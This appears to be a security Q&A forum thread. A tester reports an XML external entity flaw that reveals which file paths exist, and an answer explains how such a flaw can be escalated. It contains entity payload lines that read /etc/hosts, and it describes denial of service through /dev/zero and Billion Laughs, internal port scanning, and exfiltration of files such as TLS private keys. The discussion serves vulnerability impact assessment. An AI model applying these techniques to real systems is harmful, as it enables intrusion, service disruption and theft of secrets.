XML external entity - Local file enumeration (Impact assessment question)

Question

I had come across an XML request-response pair while testing a web application and attempted to inject XXE payloads. Note that in this case no XML parameter sent in the request was getting reflected in the response. However as the request and response were in XML I decided to try XXE payloads.

Though I was not able to include any local file from the server in the response, I received different HTTP responses for request containing valid and invalid file names. e.g.

<!ENTITY file SYSTEM "file:///etc/hosts" (valid file) 
<!ENTITY file SYSTEM "file:///etc/hosts1" (invalid file)

For each of the above cases different HTTP responses were received. The valid file name returned an XML response without any errors and the invalid file name returned an XML parsing error clearly stating - 'file not found'.

I am finished with my report for the activity and have reported this issue as "File name enumeration due to XML parsing errors". However I was curious about different ways in which this vulnerability can be exploited to obtain more information about the back end server and would like to receive any inputs to assess the technical impact of this vulnerability.

Answer 1

Not a complete answer, but it's worth noting that XXE can often be a DoS bug as well as an information disclosure bug. Try reading from /dev/zero or \\.\pipe\atsvc or any other kind of special pipe/socket/file that either never ends or will simply block for approximately forever. Of course, if XXE works then you can usually also do recursive entity expansion (a.k.a. Billion Laughs, which is also a pretty easy DoS.

XXE can also be used to pivot a network scan behind the server's firewall. You don't have to specify a file: URI scheme; http:, https:, ftp:, and so on work too. You can also specify non-standard ports, which is helpful when looking for things like certain admin interfaces. This is, of course, more useful when you have access to the contents of those URLs, but just knowing the services are there is often helpful.

It's very odd that you weren't able to get the file contents. Usually that's possible in one way or another, be it via an error message or by specifying the file contents as user-supplied input and then reading them out using another function (as in, "why yes, my home address is the contents of your TLS private key!").